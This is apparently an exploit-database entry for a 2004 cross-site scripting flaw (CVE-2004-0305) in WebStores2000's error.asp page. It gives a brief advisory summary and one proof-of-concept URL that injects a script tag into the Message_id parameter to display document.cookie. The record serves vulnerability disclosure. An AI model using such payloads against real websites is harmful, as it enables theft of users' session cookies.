WebCortex WebStores2000 - 'error.asp' Cross-Site Scripting

Author: Nick Gudov
type: webapps
platform: asp
port: 
date_added: 2004-02-18
date_updated: 2012-12-29
verified: 1
codes: CVE-2004-0305;OSVDB-3994
tags: 
aliases: 
screenshot_url: 
application_url: 

source: https://www.securityfocus.com/bid/9693/info

It has been reported that WebStores2000 is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks.

http://www.example.com/error.asp?Message_id=35<script>alert(document.cookie)</script>
↑